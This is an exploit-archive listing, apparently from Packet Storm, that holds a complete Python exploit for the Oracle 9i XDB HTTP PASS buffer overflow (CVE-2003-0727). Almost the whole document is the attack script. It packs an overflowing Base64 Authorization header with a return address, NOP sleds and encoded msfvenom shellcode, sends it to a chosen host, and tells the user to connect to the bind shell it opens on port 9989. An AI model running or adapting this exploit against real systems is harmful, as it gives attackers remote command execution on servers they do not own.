Oracle 9i XDB 9.2.01 HTTP PASS Buffer Overflow

2017-09-2600:00:00
Charles Dardaman
packetstormsecurity.com
EPSS
0.932
Percentile
99.1%
JSON
`#Exploit Title:Oracle 9i XDB HTTP PASS Buffer Overflow  
#Date: 09/25/2017  
#Exploit Author: Charles Dardaman  
#Twitter: https://twitter.com/CharlesDardaman  
#Website: http://www.dardaman.com  
#Version:9.2.0.1  
#Tested on: Windows 2000 SP4  
#CVE: 2003-0727  
#This is a modified stand alone exploit of https://www.exploit-db.com/exploits/16809/  
  
#!/usr/bin/python  
  
  
import socket, sys, base64  
  
#usage ./oracle9i_xbd_pass <target ip> <target port>  
  
rhost = sys.argv[1] #target ip  
rport = int(sys.argv[2]) #target port  
  
#Variables:  
ret = "\x46\x6d\x61\x60" #0x60616d46 Little endian form  
nop = "\x90"  
pre = "\x81\xc4\xff\xef\xff\xff\x44" #This has to be prepended into the shellcode.  
  
#msfvenom -p windows/shell_bind_tcp lport=9989 exitfunc=thread -f py -b "\x00" -e x86/shikata_ga_nai  
#355 bytes  
payload = ""  
payload += pre  
payload += "\xba\x64\xdb\x93\xe7\xda\xd6\xd9\x74\x24\xf4\x58\x29"  
payload += "\xc9\xb1\x53\x31\x50\x12\x83\xc0\x04\x03\x34\xd5\x71"  
payload += "\x12\x48\x01\xf7\xdd\xb0\xd2\x98\x54\x55\xe3\x98\x03"  
payload += "\x1e\x54\x29\x47\x72\x59\xc2\x05\x66\xea\xa6\x81\x89"  
payload += "\x5b\x0c\xf4\xa4\x5c\x3d\xc4\xa7\xde\x3c\x19\x07\xde"  
payload += "\x8e\x6c\x46\x27\xf2\x9d\x1a\xf0\x78\x33\x8a\x75\x34"  
payload += "\x88\x21\xc5\xd8\x88\xd6\x9e\xdb\xb9\x49\x94\x85\x19"  
payload += "\x68\x79\xbe\x13\x72\x9e\xfb\xea\x09\x54\x77\xed\xdb"  
payload += "\xa4\x78\x42\x22\x09\x8b\x9a\x63\xae\x74\xe9\x9d\xcc"  
payload += "\x09\xea\x5a\xae\xd5\x7f\x78\x08\x9d\xd8\xa4\xa8\x72"  
payload += "\xbe\x2f\xa6\x3f\xb4\x77\xab\xbe\x19\x0c\xd7\x4b\x9c"  
payload += "\xc2\x51\x0f\xbb\xc6\x3a\xcb\xa2\x5f\xe7\xba\xdb\xbf"  
payload += "\x48\x62\x7e\xb4\x65\x77\xf3\x97\xe1\xb4\x3e\x27\xf2"  
payload += "\xd2\x49\x54\xc0\x7d\xe2\xf2\x68\xf5\x2c\x05\x8e\x2c"  
payload += "\x88\x99\x71\xcf\xe9\xb0\xb5\x9b\xb9\xaa\x1c\xa4\x51"  
payload += "\x2a\xa0\x71\xcf\x22\x07\x2a\xf2\xcf\xf7\x9a\xb2\x7f"  
payload += "\x90\xf0\x3c\xa0\x80\xfa\x96\xc9\x29\x07\x19\xd2\xac"  
payload += "\x8e\xff\x76\xbf\xc6\xa8\xee\x7d\x3d\x61\x89\x7e\x17"  
payload += "\xd9\x3d\x36\x71\xde\x42\xc7\x57\x48\xd4\x4c\xb4\x4c"  
payload += "\xc5\x52\x91\xe4\x92\xc5\x6f\x65\xd1\x74\x6f\xac\x81"  
payload += "\x15\xe2\x2b\x51\x53\x1f\xe4\x06\x34\xd1\xfd\xc2\xa8"  
payload += "\x48\x54\xf0\x30\x0c\x9f\xb0\xee\xed\x1e\x39\x62\x49"  
payload += "\x05\x29\xba\x52\x01\x1d\x12\x05\xdf\xcb\xd4\xff\x91"  
payload += "\xa5\x8e\xac\x7b\x21\x56\x9f\xbb\x37\x57\xca\x4d\xd7"  
payload += "\xe6\xa3\x0b\xe8\xc7\x23\x9c\x91\x35\xd4\x63\x48\xfe"  
payload += "\xf4\x81\x58\x0b\x9d\x1f\x09\xb6\xc0\x9f\xe4\xf5\xfc"  
payload += "\x23\x0c\x86\xfa\x3c\x65\x83\x47\xfb\x96\xf9\xd8\x6e"  
payload += "\x98\xae\xd9\xba"  
  
  
  
exploit = "AAAA:" + "B"*442 + "\xeb\x64" + (nop*2) + ret + (nop*266) +"\xeb\x10" + (nop*109) + payload + (nop * (400-len(payload)))  
  
  
request = "GET / HTTP/1.1\r\n" + "Host: " + rhost + ":" + str(rport) + "\r\n" + "Authorization: Basic " + base64.b64encode(exploit) + "\r\n\r\n"  
  
print ("Attacking " + rhost + ":" + str(rport))  
  
#Connect to the target  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((rhost,rport))  
#Send exploit  
s.send(request)  
s.close()  
  
print ("Try to connect on port 9989.")  
  
`
EPSS
0.932
Percentile
99.1%
JSON
Related for PACKETSTORM:144341